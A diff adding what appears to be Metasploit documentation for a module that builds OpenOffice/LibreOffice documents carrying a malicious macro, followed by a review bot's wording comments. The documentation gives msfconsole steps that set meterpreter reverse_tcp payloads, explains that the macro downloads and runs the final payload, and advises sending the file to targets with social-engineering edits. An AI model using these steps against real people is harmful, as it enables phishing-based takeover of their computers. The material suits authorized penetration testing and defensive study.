|
| 1 | +## Description |
| 2 | + |
| 3 | +This module generates an Apache OpenOffice Text Document with a malicious macro in it. It also |
| 4 | +works against LibreOffice. |
| 5 | + |
| 6 | +For exploit successfully, the targeted user must adjust the security level in Macro Security to |
| 7 | +either Medium or Low. If set to Medium, a prompt is presented to the user to enable or disable the |
| 8 | +macro. If set to Low, the macro can automatically run without any warning. |
| 9 | + |
| 10 | +## Vulnerable Application |
| 11 | + |
| 12 | +* Apache OpenOffice |
| 13 | +* LibreOffice |
| 14 | + |
| 15 | +## Verification Steps |
| 16 | + |
| 17 | +To use this exploit, you must know the platform of the targeted user. The module supports either |
| 18 | +Windows, Linux, and OSX. If the target is using Windows, then the exploit will generate the macro |
| 19 | +with malicious Powershell code inside. For other supported platforms, the exploit will generate |
| 20 | +Python code. |
| 21 | + |
| 22 | +An example of using this module against Windows: |
| 23 | + |
| 24 | +1. Start msfconsole |
| 25 | +2. ```use exploit/multi/misc/openoffice_document_macro``` |
| 26 | +3. ```set target 0``` |
| 27 | +4. ```set payload windows/meterpreter/reverse_tcp``` |
| 28 | +5. ```exploit``` |
| 29 | + |
| 30 | +An example of using this module against Linux or OSX: |
| 31 | + |
| 32 | +1. Start msfconsole |
| 33 | +2. ```use exploit/multi/misc/openoffice_document_macro``` |
| 34 | +3. ```set target 1``` |
| 35 | +4. ```set payload python/meterpreter/reverse_tcp``` |
| 36 | +5. ```exploit``` |
| 37 | + |
| 38 | +Once started, the module will mainly do these things: |
| 39 | + |
| 40 | +1. It will start a payload handler. |
| 41 | +2. It will start a web server. This is used for the macro to download and execute our final payload. |
| 42 | +3. The malicious odt file. Send this to your targeted user. |
| 43 | + |
| 44 | +## Options |
| 45 | + |
| 46 | +**BODY** |
| 47 | + |
| 48 | +This option can be used to insert text to the malicious document. |
| 49 | + |
| 50 | +## Modification |
| 51 | + |
| 52 | +Since social engineering will play a big part in the success of the attack, you will most likely |
| 53 | +want to modify the odt file. |
| 54 | + |
| 55 | +1. To do so, first use msfconsole to generate the malicious odt file. |
| 56 | +2. Move the odt file to a system that has OpenOffice or LibreOffice |
| 57 | +3. You can just use OpenOffice/LibreOffice to edit the file. Make sure you don't modify the macro |
| 58 | + code unless you actually know what you're doing. |
| 59 | + |
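Review bot: The "Verification Steps" section (new-file lines 15-42) stops at `exploit` and never says what the user should see to confirm the module worked; add the expected console output or resulting state after the last step so the steps can actually be verified. In the same section, the list at lines 40-42 is not parallel: items 1 and 2 are actions ("It will start ..."), while item 3 is the fragment "The malicious odt file."; reword it as an action, for example "It will generate the malicious odt file." Wording fixes: line 6 "For exploit successfully" should read "For the exploit to succeed", and line 17 "supports either Windows, Linux, and OSX" names three platforms after "either", so drop "either". Under "Options" only BODY is documented; if the module exposes other options, list them here as well.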